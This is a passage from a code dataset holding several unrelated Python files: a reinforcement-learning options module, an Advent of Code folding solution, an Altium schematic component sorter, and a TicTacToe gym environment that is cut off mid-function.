dones[0],\r\n # 'action': action_chain[-1],\r\n # 'probs': rl_outputs[-1].probs[0],\r\n # 'Q_vals': rl_outputs[-1].Q_vals[0],\r\n # 'param': param, \r\n # 'mask': self.dataset_model.get_active_mask(), \r\n # 'termination': terminations[-1], \r\n # 'reward': rewards[-1], \r\n # 'done': dones[-1]}\r\n\r\n\r\n def get_input_state(self, state = None): # gets the state used for the forward model/policy\r\n if state is not None:\r\n input_state = self.gamma_featurizer(self.pytorch_model.wrap(environment_model.get_flattened_state(), cuda=args.cuda))\r\n else:\r\n input_state = self.gamma_featurizer(self.pytorch_model.wrap(environment_model.flatten_factored_state(state)))\r\n return input_state\r\n\r\n def forward(self, state, param): # runs the policy and gets the RL output\r\n return self.policy(state, param)\r\n\r\n def compute_return(self, gamma, start_at, num_update, next_value, return_max = 20, return_form=\"value\"):\r\n return self.rollouts.compute_return(gamma, start_at, num_update, next_value, return_max = 20, return_form=\"value\")\r\n\r\n # def set_behavior_epsilon(self, epsilon):\r\n # self.behavior_policy.epsilon = epsilon\r\n\r\n\r\n def save(self, save_dir, clear=False):\r\n # checks and prepares for saving option as a pickle\r\n policy = self.policy\r\n if len(save_dir) > 0:\r\n try:\r\n os.makedirs(save_dir)\r\n except OSError:\r\n pass\r\n env = self.environment_model.environment\r\n self.environment_model.environment = None\r\n self.policy.cpu() \r\n self.policy.save(save_dir, self.object_name +\"_policy\")\r\n print(self.iscuda)\r\n if self.iscuda:\r\n self.policy.cuda()\r\n if clear:\r\n self.policy = None# removes the policy and rollouts for saving\r\n self.environment_model.environment = env\r\n return policy\r\n return None, None\r\n\r\n def load_policy(self, load_dir):\r\n if len(load_dir) > 0:\r\n self.policy = torch.load(os.path.join(load_dir, self.object_name +\"_policy.pt\"))\r\n print(self.policy)\r\n\r\n\r\n\r\nclass PrimitiveOption(Option): # primative discrete actions\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device=-1, action_featurizer=None, param_first=False, no_input=False):\r\n self.num_params = models[1].environment.num_actions\r\n self.object_name = \"Action\"\r\n self.action_featurizer = action_featurizer\r\n environment = models[1].environment\r\n self.action_space = models[1].environment.action_space\r\n self.action_shape = environment.action_space.shape or (1,)\r\n self.action_prob_shape = environment.action_space.shape or (1,)\r\n self.output_prob_shape = environment.action_space.shape or environment.action_space.n# (models[1].environment.num_actions, )\r\n print(self.action_shape[0])\r\n self.action_mask = np.ones(self.action_shape)\r\n self.discrete = self.action_shape[0] == 1\r\n self.discrete_actions = models[1].environment.discrete_actions\r\n self.control_max = environment.action_space.n if self.discrete_actions else environment.action_space.high\r\n self.control_min = None if self.discrete_actions else environment.action_space.low\r\n self.action_max = environment.action_space.shape or environment.action_space.n\r\n self.next_option = None\r\n self.iscuda = False\r\n self.policy = None\r\n self.dataset_model = None\r\n self.time_cutoff = 1\r\n self.rollouts = None\r\n self.terminated = True\r\n\r\n\r\n def save(self, save_dir, clear=False):\r\n return None\r\n\r\n def load_policy(self, load_dir):\r\n pass\r\n\r\n def set_behavior_epsilon(self, epsilon):\r\n pass\r\n\r\n def step(self, last_state, chain):\r\n pass\r\n\r\n def record_state(self, state, next_state, action_chain, rl_outputs, param, rewards, dones):\r\n pass\r\n\r\n def cpu(self):\r\n self.iscuda = False\r\n\r\n def cuda(self):\r\n self.iscuda = True\r\n\r\n def get_possible_parameters(self):\r\n if self.iscuda:\r\n return [(torch.tensor([i]).cuda(), torch.tensor([1]).cuda()) for i in range(self.num_params)]\r\n return [(torch.tensor([i]), torch.tensor([1])) for i in range(self.num_params)]\r\n\r\n def sample_action_chain(self, batch, state, random=False, force=False, preserve=False, use_model=False): # param is an int denoting the primitive action, not protected (could send a faulty param)\r\n param = batch['param']\r\n if self.discrete_actions:\r\n sq_param = int(param.squeeze())\r\n else:\r\n sq_param = param.squeeze()\r\n if random:\r\n sq_param = self.action_space.sample()\r\n chain = [sq_param]\r\n return sq_param, chain, None, list(), True # chain is the action as an int, policy batch is None, state chain is a list, resampled is True\r\n\r\n def terminate_reward(self, state, next_state, param, chain, mask=None, needs_reward=False):\r\n return [1], [0], [1]\r\n\r\n def predict_state(self, factored_state, raw_action):\r\n new_action = copy.deepcopy(factored_state[\"Action\"])\r\n new_action = self.action_featurizer.assign_feature({\"Action\": new_action}, raw_action, factored=True)\r\n return [1], new_action\r\n\r\n\r\nclass RawOption(Option):\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device = -1, param_first=False, no_input=False):\r\n super().__init__(policy_reward, models, object_name, temp_ext=temp_ext, relative_actions=relative_actions, relative_state=relative_state,\r\n relative_param=relative_param, discretize_acts=discretize_acts, param_first=param_first, no_input=no_input)\r\n self.object_name = \"Raw\"\r\n self.action_shape = (1,)\r\n self.action_prob_shape = (self.environment_model.environment.num_actions,)\r\n self.discrete_actions = self.environment_model.environment.discrete_actions\r\n self.action_max = self.environment_model.environment.action_space.n if self.discrete_actions else self.environment_model.environment.action_space.high\r\n self.action_space = self.environment_model.environment.action_space\r\n self.control_max = 0 # could put in \"true\" parameter, unused otherwise\r\n self.discrete = False # This should not be used, since rawoption is not performing parameterized RL\r\n self.use_mask = False\r\n self.stack = torch.zeros((4,84,84))\r\n # print(\"frame\", self.environment_model.environment.get_state()['Frame'].shape)\r\n # self.param = self.environment_model.get_param(self.environment_model.environment.get_state()[1])\r\n self.param = self.environment_model.get_param(self.environment_model.environment.get_state())\r\n\r\n # def get_state_dict(self, state, next_state, action_chain, rl_outputs, param, rewards, dones, termination): # also used in HER\r\n # return {'state': self.get_state(state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'next_state': self.get_state(next_state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'object_state': state[\"Object\"],\r\n # 'next_object_state': next_state[\"Object\"],\r\n # 'state_diff': state[\"Action\"], # storing some dummy information\r\n # 'true_action': action_chain[0],\r\n # 'true_reward': rewards[0],\r\n # 'true_done': dones[0],\r\n # 'action': action_chain[-1],\r\n # 'probs': None if rl_outputs[-1].probs is None else rl_outputs[-1].probs[0],\r\n # 'Q_vals': None if rl_outputs[-1].Q_vals is None else rl_outputs[-1].Q_vals[0],\r\n # 'param': param, \r\n # 'mask': self.dataset_model.get_active_mask(), \r\n # 'termination': termination[-1],\r\n # 'reward': rewards[-1], \r\n # 'done': dones[-1]}\r\n\r\n def assign_param(self, state, param):\r\n return self.param_process(state, param)\r\n\r\n def get_param(self, full_state, terminate, force=False):\r\n if terminate or force:\r\n self.param = self.environment_model.get_param(full_state)\r\n return self.param, [1], True\r\n return self.param, [1], False\r\n\r\n def get_possible_parameters(self):\r\n if self.iscuda:\r\n return [(torch.tensor([1]).cuda(), torch.tensor([1]).cuda())]\r\n return [(torch.tensor([1]), torch.tensor([1]))]\r\n\r\n def cuda(self):\r\n super().cuda()\r\n # self.stack = self.stack.cuda()\r\n\r\n def get_state(self, full_state = None, form=1, inp=0, rel=0, param=None):\r\n if not full_state: return self.environment_model.get_state()['raw_state']\r\n if type(full_state) is list or type(full_state) is np.ndarray: \r\n if inp == 1:\r\n return np.array([self.environment_model.get_object(f) for f in full_state])\r\n return np.array([f['raw_state'] for f in full_state])\r\n else:\r\n if inp == 1:\r\n return self.environment_model.get_object(full_state)\r\n return full_state['raw_state']\r\n\r\n def get_input_state(self):\r\n # stack = stack.roll(-1,0)\r\n # stack[-1] = pytorch_model.wrap(self.environment_model.environment.frame, cuda=self.iscuda)\r\n # input_state = stack.clone().detach()\r\n\r\n input_state = self.get_state(self.environment_model.get_state())\r\n return input_state\r\n\r\n\r\n def sample_action_chain(self, batch, state_chain, random=False, force=False, preserve=False, use_model=False):\r\n '''\r\n Takes an action in the state, only accepts single states. Since the initiation condition extends to all states, this is always callable\r\n also returns whether the current state is a termination condition. The option will still return an action in a termination state\r\n The temporal extension of options is exploited using temp_ext, which first checks if a previous option is still running, and if so returns the same action as before\r\n '''\r\n # input_state = pytorch_model.wrap(self.environment_model.environment.frame, cuda=self.iscuda)\r\n # self.stack = self.stack.roll(-1,0)\r\n # self.stack[-1] = input_state\r\n # input_state = self.stack.clone()\r\n if random:\r\n act = self.action_space.sample()\r\n policy_batch = None\r\n state = None\r\n else:\r\n batch['obs'] = self.get_state(batch['full_state'])\r\n # batch['next_obs'] = self.get_state(batch['next_full_state'])\r\n state = None if state_chain is None else state_chain[-1]\r\n policy_batch = self.policy.forward(batch, state) # uncomment this\r\n act = policy_batch.act\r\n state = [policy_batch.state] if state is not None else None\r\n # get the action from the behavior policy, baction is integer for discrete\r\n act = to_numpy(act)\r\n act = self.policy.exploration_noise(act, batch)\r\n act = act.squeeze()\r\n\r\n # input_state = pytorch_model.wrap(self.environment_model.get_raw_state(state), cuda=self.iscuda)\r\n # print(\"raw_state\", self.environment_model.get_raw_state(state), input_state)\r\n # if len(param.shape) == 1:\r\n # param = param.unsqueeze(0)\r\n # rl_output = self.policy.forward(input_state.unsqueeze(0), param) # uncomment later\r\n # rl_output = policy.forward(input_state.unsqueeze(0), param)\r\n # print(\"forwarded\")\r\n # baction = self.behavior_policy.get_action(rl_output)\r\n chain = [act]\r\n # print(chain)\r\n return act, chain, policy_batch, state, True # resampled is always true since there is no temporal extension\r\n\r\n def terminate_reward(self, state, next_state, param, chain, mask=None, needs_reward=False):\r\n # print(state)\r\n return state[\"factored_state\"][\"Done\"], state[\"factored_state\"][\"Reward\"], state[\"factored_state\"][\"Done\"]\r\n # return [int(self.environment_model.environment.done or self.timer == (self.time_cutoff - 1))], [self.environment_model.environment.reward]#, torch.tensor([self.environment_model.environment.reward]), None, 1\r\n\r\n # The definition of this function has changed\r\n def get_action(self, action, mean, variance):\r\n idx = action\r\n return mean[torch.arange(mean.size(0)), idx.squeeze().long()], None#torch.log(mean[torch.arange(mean.size(0)), idx.squeeze().long()])\r\n\r\nclass ModelCounterfactualOption(Option):\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device=-1, param_first=False, no_input=False):\r\n super().__init__(policy_reward, models, object_name, temp_ext=temp_ext, relative_actions=relative_actions, relative_state=relative_state,\r\n relative_param=relative_param, discretize_acts=discretize_acts, param_first=param_first, no_input=no_input)\r\n self.action_prob_shape = self.next_option.output_prob_shape\r\n if self.discrete_actions:\r\n self.action_shape = (1,)\r\n else:\r\n self.action_shape = self.next_option.output_prob_shape\r\n print(self.next_option.control_max)\r\n self.action_max = np.array(self.next_option.control_max)\r\n self.action_min = np.array(self.next_option.control_min)\r\n self.control_max = np.array(self.dataset_model.control_max)\r\n self.control_min = np.array(self.dataset_model.control_min)\r\n self.policy_min = -1 * np.ones(self.action_min.shape) # policy space is always the same\r\n self.policy_max = 1 * np.ones(self.action_min.shape)\r\n self.expand_policy_space = False\r\n if self.next_option.object_name != \"Action\":\r\n self.expand_policy_space = True\r\n\r\n # if we are converting the space to be discrete. If discretize_acts is a dict, use it directly\r\n if type(discretize_acts) == dict:\r\n self.discrete_dict = discretize_acts \r\n elif discretize_acts:\r\n self.discrete_dict = discretize_actions(self.action_min.shape)\r\n\r\n if type(discretize_acts) == dict:\r\n acts = np.stack([v for v in self.discrete_dict.values()], axis = 0)\r\n self.action_min = np.min(acts, axis=0)\r\n self.action_max = np.max(acts, axis=0)\r\n self.policy_action_space = gym.spaces.Discrete(len(list(self.discrete_dict.keys())))\r\n self.policy_action_shape = (1,)\r\n self.action_shape = self.action_min.shape\r\n self.action_space = gym.spaces.Box(self.action_min, self.action_max)\r\n self.relative_action_space = gym.spaces.Discrete(len(list(self.discrete_dict.keys()))) # This should not be used\r\n else:\r\n if self.discrete_actions and discretize_acts:\r\n self.policy_action_space = gym.spaces.Discrete(len(list(self.discrete_dict.keys())))\r\n if self.discrete_actions and not discretize_acts:\r\n self.policy_action_space = gym.spaces.Discrete(self.next_option.control_max)\r\n self.action_space = gym.spaces.Discrete(self.next_option.control_max)\r\n self.relative_action_space = gym.spaces.Discrete(self.next_option.control_max) # no relative actions for discrete\r\n if (self.discrete_actions and discretize_acts) or not self.discrete_actions:\r\n self.action_space = gym.spaces.Box(self.action_min, self.action_max)\r\n rng = self.action_max - self.action_min\r\n self.relative_action_space = gym.spaces.Box(-rng / self.range_limiter, rng / self.range_limiter)\r\n print(self.action_min, self.action_max)\r\n if not self.discrete_actions:\r\n self.policy_action_space = gym.spaces.Box(self.policy_min, self.policy_max)\r\n self.policy_action_shape = self.policy_min.shape\r\n self.last_action = np.zeros(self.action_shape)\r\n if self.discrete_actions:\r\n self.last_action = np.zeros(self.action_shape)[0]\r\n self.last_act = np.zeros(self.policy_action_shape)\r\n print(self.last_action, self.last_act, self.discrete_actions, self.action_shape, self.action_min, self.control_min, self.policy_min)\r\n \r\n \r\n self.output_prob_shape = (self.dataset_model.delta.output_size(), ) # continuous, so the size will match\r\n # TODO: fix this so that the output size is equal to the nonzero elements of the self.dataset_model.selection_binary() at each level\r\n\r\n # force all previous options to have zero \r\n self.next_option.set_behavior_epsilon(0)\r\n\r\n def set_behavior_epsilon(self, epsilon):\r\n if self.policy is not None:\r\n self.policy.set_eps(epsilon)\r\n if self.next_option is not None and self.next_option.policy is not None:\r\n self.next_option.set_behavior_epsilon(epsilon)\r\n\r\n def get_cont(self, act):\r\n if self.discretize_actions:\r\n if type(act) == np.ndarray:\r\n return np.array([self.discrete_dict[a].copy() for a in act])\r\n return self.discrete_dict[act].copy()\r\n\r\n def get_discrete(self, act):\r\n def find_closest(a):\r\n closest = (-1, 99999999)\r\n for i in range(len(list(self.discrete_dict.keys()))):\r\n dist = np.linalg.norm(a - np.array(self.discrete_dict[i]))\r\n if dist < closest[1]:\r\n closest = (i,dist)\r\n return closest[0]\r\n if self.discretize_actions:\r\n if type(act) == np.ndarray and len(act.shape) > 1:\r\n return np.array([find_closest(a) for a in act])\r\n return find_closest(act)\r\n\r\n\r\n def get_action(self, action, mean, variance):\r\n if self.discrete_actions:\r\n return mean[torch.arange(mean.size(0)), action.squeeze().long()], torch.log(mean[torch.arange(mean.size(0)), action.squeeze().long()])\r\n idx = action\r\n dist = torch.distributions.normal.Normal # TODO: hardcoded action distribution as diagonal gaussian\r\n log_probs = dist(mean, variance).log_probs(action)\r\n return torch.exp(log_probs), log_probs\r\n\r\n def get_critic(self, state, action, mean):\r\n return self.policy.compute_Q(state, action)\r\n\r\nclass ForwardModelCounterfactualOption(ModelCounterfactualOption):\r\n ''' Uses the forward model to choose the action '''\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device=-1, param_first=False, no_input=False):\r\n super().__init__(policy_reward, models, object_name, temp_ext=temp_ext, relative_actions = relative_actions, relative_state=relative_state, \r\n relative_param=relative_param, discretize_acts=discretize_acts, device=device, param_first=param_first, no_input=no_input)\r\n self.sample_per = 5\r\n self.max_propagate = 3\r\n self.epsilon_reward = .1\r\n self.time_range = list(range(0, 1)) # timesteps to sample for interaction/parameter (TODO: negative not supported)\r\n self.uniform = True\r\n self.stepsize = 2\r\n self.use_true_model = False\r\n if self.use_true_model:\r\n self.dummy_env_model = copy.deepcopy(self.environment_model)\r\n if not self.discrete_actions: # sample all discrete actions if action space is discrete\r\n self.var = 6 # samples uniformly in a range around the target position, altering the values of mask\r\n\r\n def single_step_search(self, center, mask):\r\n # weights for possible deviations uniformly around the center, and center (zero)\r\n if self.uniform:\r\n num = (self.var * 2) // self.stepsize + 1\r\n vals = np.stack([np.linspace(-self.var, self.var, num ) for i in range(self.next_option.mask.shape[0])], axis=1)\r\n samples = center + vals * mask\r\n else:\r\n vals = (np.random.rand(*[self.sample_per] + list(self.next_option.mask.shape)) - .5) * 2\r\n samples = center + vals * self.var * mask\r\n # samples are around the center with max dev self.var but only changing masked values\r\n \r\n # print(vals * self.var, mask)\r\n # print(center, samples)\r\n return samples\r\n\r\n def predict_state(self, factored_state, raw_action):\r\n if self.use_true_model:\r\n expand = False\r\n if type(factored_state) == Batch and len(factored_state.shape) > 1:\r\n expand = True\r\n factored_state = factored_state[0] # TODO: only supports expanded by 2\r\n self.dummy_env_model.set_from_factored_state(factored_state)\r\n with suppress_stdout_stderr():\r\n full_state, rew, done, info = self.dummy_env_model.step(raw_action)\r\n if expand:\r\n return None, Batch([full_state['factored_state']])\r\n return None, Batch(full_state['factored_state'])\r\n else:\r\n return super().predict_state(factored_state, raw_action)\r\n\r\n def collect(self, full_state):\r\n # search by calling single step search time range number of times\r\n all_samples = list()\r\n all_orig = list()\r\n factored_state = full_state['factored_state']\r\n for i in self.time_range:\r\n # gather samples around the given state reached\r\n # print(factored_state)\r\n inters, next_factored_state = self.predict_state(factored_state, 0) # TODO: raw action hacked to no-op for now\r\n next_factored_state = self.np_state(next_factored_state)\r\n full_state = {\"factored_state\": next_factored_state, \"PARTIAL\": 1}\r\n center = self.next_option.get_state(full_state, setting=self.next_option.output_setting, factored=True)\r\n obj_samples = self.single_step_search(center, self.next_option.mask)\r\n # for each of the samples, broadcast the object state\r\n broadcast_obj_state = np.stack([next_factored_state[self.object_name].copy() for i in range(len(obj_samples))], axis=0)\r\n # print(next_factored_state[self.object_name].copy(), broadcast_obj_state, obj_samples)\r\n # factored state with only the pair of objects needed, because we ONLY forward predict the next factored state of the current object\r\n all_samples.append({self.object_name: broadcast_obj_state, self.next_option.object_name: obj_samples})\r\n all_orig.append({self.object_name: next_factored_state[self.object_name].copy(), self.next_option.object_name: center})\r\n factored_state = Batch(next_factored_state)\r\n\r\n # returns the factored states, the first is giving back the original state, but propagated for the time range, the second is the factored state for the samples\r\n return ( Batch({self.object_name: np.stack([all_orig[i][self.object_name] for i in range(len(all_orig))], axis=0), \r\n self.next_option.object_name: np.stack([all_orig[i][self.next_option.object_name] for i in range(len(all_orig))], axis=0)}), \r\n Batch({self.object_name: np.concatenate([all_samples[i][self.object_name] for i in range(len(all_samples))], axis=0), \r\n self.next_option.object_name: np.concatenate([all_samples[i][self.next_option.object_name] for i in range(len(all_samples))], axis=0)}))\r\n \r\n def enumerate_rewards(self, factored_state):\r\n # outputs the rewards, and the action state (state that can be converted to an action by the CURRENT option)\r\n inters, preds = self.dataset_model.predict_next_state(factored_state)\r\n state = {\"factored_state\": factored_state, \"PARTIAL\": 1} # hopefully limited factored state is sufficient\r\n input_state = self.get_state(state, setting=self.inter_setting, factored=True)\r\n action_state = self.next_option.get_state(state, setting=self.next_option.output_setting, factored=True)\r\n # print(\"enum\", preds, state, action_state)\r\n object_state = pytorch_model.unwrap(preds)\r\n # get the first action\r\n # print(input_state, object_state, self.mask, self.param)\r\n rewards = self.reward.get_reward(input_state, object_state, self.param, self.mask, 0)\r\n return action_state, rewards\r\n\r\n def propagate_state(self, batch, state_chain, mapped_act):\r\n '''\r\n roll forward until time limit or we hit the end of temporal extension, then start guessing future states\r\n '''\r\n state = copy.deepcopy(batch['full_state'])\r\n input_state = self.next_option.get_state(state, setting=self.next_option.inter_setting, factored=True)\r\n object_state = self.next_option.get_state(state, setting=self.next_option.output_setting, factored=True)\r\n # get the first action\r\n act, chain, policy_batch, pol_state, resampled = self.sample_action_chain(batch, state_chain, preserve=True)\r\n # print(mapped_act, chain[-1])\r\n # if self.mask is None:\r\n # self.mask = self.dataset_model.get_active_mask() # doesn't use the sampler's mask\r\n # while we haven't reached the target location\r\n timer = 0\r\n term = False\r\n factored_state = state['factored_state']\r\n while (timer < self.max_propagate and not term):\r\n # get the next state\r\n # print(\"curr fac\", Batch(factored_state))\r\n inters, factored_state = self.predict_state(factored_state, chain[0]) # TODO: add optional replacement with predictions from environment model\r\n factored_state = self.np_state(factored_state)\r\n state = {\"factored_state\": factored_state, \"PARTIAL\": 1} # hopefully limited factored state is sufficient\r\n input_state = self.next_option.get_state(state, setting=self.next_option.inter_setting, factored=True)\r\n object_state = self.next_option.get_state(state, setting=self.next_option.output_setting, factored=True)\r\n # get the first action\r\n batch = copy.deepcopy(batch) # TODO: is copy inefficient?\r\n batch.update(full_state = [state], obs = self.get_state(state, setting=self.input_setting, factored=True, param=self.param))\r\n # print(batch)\r\n act, chain, policy_batch, pol_state, resampled = self.sample_action_chain(batch, state_chain, preserve=True, use_model=False)\r\n # print(\"input_state\", self.object_name, input_state)\r\n term = self.next_option.termination.check(input_state, object_state, self.next_option.convert_param(chain[-1]), self.next_option.mask, 0)\r\n factored_state = Batch([factored_state])\r\n timer += 1\r\n # print(timer, self.max_propagate, term, factored_state, chain)\r\n state = {\"factored_state\": factored_state, \"PARTIAL\": 1}\r\n return state\r\n\r\n def search(self, batch, state_chain, act, mapped_act):\r\n # print(\"starting\", act, mapped_act)\r\n full_state = self.propagate_state(batch, state_chain, mapped_act)\r\n base_factored_states, sample_factored_states = self.collect(full_state)\r\n # print(base_factored_states, sample_factored_states)\r\n sample_action_state, sample_rewards = self.enumerate_rewards(sample_factored_states)\r\n base_action_state, base_rewards = self.enumerate_rewards(base_factored_states)\r\n def convert_state_to_action(obj_state):\r\n # TODO: assumes that obj_state is in the order of mask, which is NOT a given\r\n act = list()\r\n for cfs in self.next_option.dataset_model.cfselectors:\r\n # print(cfs.feature_selector(obj_state))\r\n act.append(cfs.feature_selector(obj_state)[0])\r\n return np.array(act)\r\n\r\n best_given_reward = np.max(base_rewards)\r\n best_sampled_reward = np.max(sample_rewards)\r\n # print(best_given_reward, best_sampled_reward)\r\n if best_given_reward + self.epsilon_reward > best_sampled_reward: # if no places have reward, return the action given\r\n # print(\"sending back given\", act, mapped_act)\r\n return act, mapped_act\r\n else:\r\n best_sampled_at = np.argmax(sample_rewards)\r\n new_act_dict = {self.next_option.object_name: sample_action_state[best_sampled_at]}\r\n new_mapped_act = convert_state_to_action(new_act_dict)\r\n new_act = self.reverse_map_action(new_mapped_act, batch)\r\n # print(\"new_selection\", new_act_dict, new_act[0], new_mapped_act, act, mapped_act)\r\n return new_act[0], mapped_act\r\n\r\n def sample_action_chain(self, batch, state_chain, random=False, force=False, use_model = False, preserve=False):\r\n return super().sample_action_chain(batch, state_chain, random=random, force=force, use_model=True, preserve=preserve)\r\n\r\n\r\n\r\n\r\noption_forms = {'model': ModelCounterfactualOption, \"raw\": RawOption, 'forward': ForwardModelCounterfactualOption}","repo_name":"CalCharles/counterfactual-options","sub_path":"Options/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":64734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27270283757","text":"\nimport numpy as np\nimport common\n\nfile = open(\"./day13/data.txt\")\nlines = file.readlines()\n\n( dots, axises) = common.parseData( lines )\n\nprint( dots )\nprint( axises )\n\nnDots = dots.shape[1]\nprint( nDots )\n\nfor axis in axises:\n\n axis = np.tile( axis, ( nDots, 1))\n dots = dots - axis.transpose()\n\n if axis[0][0] == 0: dots[1,:] = -np.abs( dots[1,:] )\n else: dots[0,:] = -np.abs( dots[0,:] )\n\n dots = dots + axis.transpose()\n #break\n\ndots = np.unique( dots, axis = 1)\nnDots = len( dots.transpose() )\n\nprint( nDots )\n\ncommon.plotDots( dots)\n\n","repo_name":"ththarkonen/advent-of-code-2021","sub_path":"day13/thermal.py","file_name":"thermal.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7969232480","text":"import logging\nimport glob\nfrom sch_doc_parser.src.python_schdoc.schdoc import Schematic\nfrom sch_doc_parser.src.python_schlib.schlib import SchematicLib\nfrom sch_doc_parser.src.data_extractor import SchematicComponentExtractor, SchematicLibComponentExtractor, ComponentData\n\n\nclass ComponentSorter:\n def __init__(self, project_path):\n self.project_path = project_path\n\n def extract_sorted_components(self):\n schdoc_files = self.get_schdoc_files_path()\n schlib_files = self.get_schlib_files_path()\n file_components = []\n lib_components = []\n for schdoc_file in schdoc_files:\n schdoc = Schematic(schdoc_file).read()\n file_components.extend(SchematicComponentExtractor(schdoc).components)\n logging.info(f'Finish extract component from {schdoc_file.rsplit(\"/\", 1)[-1]}')\n for schlib_file in schlib_files:\n schlib = SchematicLib(schlib_file).read()\n lib_components.append(SchematicLibComponentExtractor(schlib).get_component())\n logging.info('Components extraction completed. Start component sorting...')\n bom_components = self.sort_components(file_components)\n for bom_component in bom_components:\n if not bom_component.part_number:\n for lib_component in lib_components:\n if lib_component.libref == bom_component.libref:\n bom_component.part_number = lib_component.part_number\n bom_component.manufacturer = lib_component.manufacturer if not bom_component.manufacturer else\\\n bom_component.manufacturer\n bom_component.description = lib_component.description if not bom_component.description else\\\n bom_component.description\n logging.info('Finish component sorting')\n return bom_components, file_components\n\n def get_schdoc_files_path(self):\n files = [file for file in glob.glob(f'{self.project_path}/**/*.SchDoc', recursive=True)]\n return files\n\n def get_schlib_files_path(self):\n files = [file for file in glob.glob(f'{self.project_path}/**/*.SchLib', recursive=True)]\n return files\n\n def sort_components(self, file_components: list[ComponentData]):\n bom_components = [file_components.pop(0)]\n for file_component in file_components:\n if file_component.part_number:\n for bom_component in bom_components:\n if bom_component.part_number and bom_component.part_number == file_component.part_number:\n self.check_designators(bom_component, file_component)\n break\n else:\n bom_components.append(file_component)\n elif file_component.comment:\n for bom_component in bom_components:\n if bom_component.comment and bom_component.comment == file_component.comment:\n self.check_designators(bom_component, file_component)\n break\n else:\n bom_components.append(file_component)\n elif file_component.footprint:\n for bom_component in bom_components:\n if bom_component.footprint and bom_component.footprint == file_component.footprint:\n self.check_designators(bom_component, file_component)\n break\n else:\n bom_components.append(file_component)\n return bom_components\n\n @staticmethod\n def check_designators(bom_component, file_component):\n if isinstance(bom_component.designator, str):\n if bom_component.designator != file_component.designator:\n bom_designator = bom_component.designator\n file_designator = file_component.designator\n bom_component.designator = [bom_designator, file_designator]\n bom_component.part_count = 2\n for key, value in file_component.properties.items():\n if key not in bom_component.properties:\n bom_component.properties.update({key: value})\n elif isinstance(bom_component.designator, list):\n for bom_designator in bom_component.designator:\n if bom_designator == file_component.designator:\n break\n else:\n bom_component.designator.append(file_component.designator)\n for key, value in file_component.properties.items():\n if key not in bom_component.properties:\n bom_component.properties.update({key: value})\n bom_component.part_count += 1\n else:\n logging.error(f'Component does not have designator!!! {bom_component}')\n","repo_name":"lvan-s/sch_doc_component_extractor","sub_path":"sch_doc_parser/src/data_sorter.py","file_name":"data_sorter.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18646122244","text":"import gym\nfrom gym import spaces\nfrom stable_baselines3 import PPO\nimport numpy as np\nimport random\nfrom stable_baselines3.common.vec_env import DummyVecEnv\nfrom TicTacToe import get_legal_moves\n\n# create the environment\nclass LearningTicTacToe(gym.Env):\n \"\"\"Tic Tac Toe game environment\"\"\"\n # training against PPO Model\n\n BOARD_SIZE = 3\n # reward values\n TIE_REWARD = 0.5\n WIN_REWARD = 1\n LOSE_REWARD = -1\n ILLEGAL = -2\n MOVE = 0.1 # reward for placing on a empty spot\n\n def __init__(self, model, train: bool = True):\n self.model = model\n\n self.action_space = spaces.Discrete(self.BOARD_SIZE ** 2)\n self.observation_space = spaces.Box(low=-1, high=1,\n shape=(self.BOARD_SIZE ** 2 + self.BOARD_SIZE ** 2,),\n dtype=np.float32)\n\n self.board = np.zeros((self.BOARD_SIZE, self.BOARD_SIZE))\n self.player = 1\n self.legal_moves = list(range(self.BOARD_SIZE ** 2))\n self.winner = None\n self.train = train\n\n def step(self, action: int):\n row = action // self.BOARD_SIZE\n col = action % self.BOARD_SIZE\n\n if self.board[row][col] == 0:\n self.board[row][col] = self.player\n done, tie = self.is_game_over()\n reward = self.get_reward(done, tie)\n self.player = -self.player\n\n if done:\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n if not self.legal_moves:\n done = True\n reward = self.TIE_REWARD\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n # Update legal moves\n self.legal_moves.remove(action)\n\n # have player two move based on model provided\n if self.train:\n action, _states = self.model.predict(\n np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), deterministic=True)\n\n row = action // self.BOARD_SIZE\n col = action % self.BOARD_SIZE\n if self.board[row][col] != 0:\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), 0, True, {}\n self.board[row][col] = self.player\n done, tie = self.is_game_over()\n reward = self.get_reward(done, tie)\n self.player = -self.player\n\n if done:\n return np.concatenate(\n (self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n # out of moves(tie)\n if not self.legal_moves:\n done = True\n reward = self.TIE_REWARD\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board)))), reward, done, {}\n\n # Invalid move, penalize and end the game\n else:\n done = True\n reward = self.ILLEGAL\n obs = np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board))))\n if self.train:\n self.reset() # call reset function to reset the environment\n self.reset() # call reset function to reset the environment\n return obs, reward, done, {}\n\n def reset(self):\n self.board = np.zeros((self.BOARD_SIZE, self.BOARD_SIZE))\n self.player = 1\n self.legal_moves = list(range(self.BOARD_SIZE ** 2)) # Reset legal moves\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board))))\n\n def render(self, mode='human'):\n print(self.board)\n\n def is_game_over(self):\n # check if rows are complete\n # returns if game is over and if it ended in a tie\n for i in range(self.BOARD_SIZE):\n if abs(sum(self.board[i])) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(self.board[i])))\n return True, 0\n\n # check cols\n for i in 